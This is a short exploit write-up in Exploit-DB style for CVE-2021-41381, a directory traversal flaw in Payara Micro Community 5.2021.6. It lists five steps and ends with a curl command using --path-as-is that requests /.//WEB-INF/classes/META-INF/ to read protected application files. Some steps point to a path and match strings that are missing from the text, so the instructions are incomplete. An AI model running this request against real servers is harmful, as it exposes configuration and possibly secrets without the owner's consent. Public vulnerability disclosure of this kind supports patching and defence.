# Exploit Title: Payara Micro Community 5.2021.6 - Directory Traversal  
# Date: 01/10/2021  
# Exploit Author: Yasser Khan (N3T_hunt3r)  
# Vendor Homepage:  
# Software Link:  
# Version: Payara Micro Community 5.2021.6  
# Tested on: Linux/Windows OS  
# CVE : CVE-2021-41381  
Proof of Concept:  
Step1: Open the browser check the version of the payara software  
Step2: Add this Path at end of the URL  
Step3: Check the response with match containing  
Step4 : If any of these contents in the response then the application is vulnerable to Directory Traversal Vulnerability.  
Step5: Alternatively we can use CURL by using this command:  
curl --path-as-is http://localhost:8080/.//WEB-INF/classes/META-INF/